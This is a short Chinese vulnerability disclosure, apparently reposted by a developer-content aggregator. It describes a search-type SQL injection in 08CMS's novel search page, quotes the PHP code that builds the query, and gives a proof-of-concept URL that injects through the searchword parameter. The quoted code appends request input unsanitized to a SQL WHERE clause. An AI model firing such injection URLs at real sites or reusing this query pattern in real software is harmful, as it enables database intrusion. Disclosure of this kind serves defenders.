08CMS小说搜索型注入 - 漏洞发布 京华志

Vul Code:
//搜索词预处理
$searchword = empty($searchword) ? '' : cutstr(trim($searchword),50,'');
$_da['searchword'] = $searchword;
if($searchword){
$filterstr .= ($filterstr ? '&' : '').'searchword='.rawurlencode(stripslashes($searchword));
}
//预处理搜索模式：标题subject、关键词keywords、内容fulltxt、会员mname
$searchmode = empty($searchmode) ? 'subject' : trim($searchmode);
if(!in_array($searchmode,array('subject','keywords','fulltxt','mname'))) $searchmode = 'subject';

if(!$chid){
$nochids = empty($nochids) ? '' : trim($nochids);
if($nochids){//排除的模型
$_da['nochids'] = $nochids;
$filterstr .= ($filterstr ? '&' : '')."nochids=".$nochids;
$nochids = explode(',',$nochids);
if($nochids) $wherestr .= " AND a.chid ".multi_str($nochids,1);
}
POC:
出现搜索型注入。
http://localhost/search.php?searchmode=subject&searchword=[%]&caid=0&chid=0&ccid4=0&indays=0&orderby=createdate&searchsubmit=1
在searchword这出现问题


by:xiaoCon

本文来源于：凯里黑客  京华志整理

www.jinghuazhi.com

最后

以上就是踏实狗为你收集整理的08CMS小说搜索型注入 - 漏洞发布 京华志的全部内容，希望文章能够帮你解决08CMS小说搜索型注入 - 漏洞发布 京华志所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。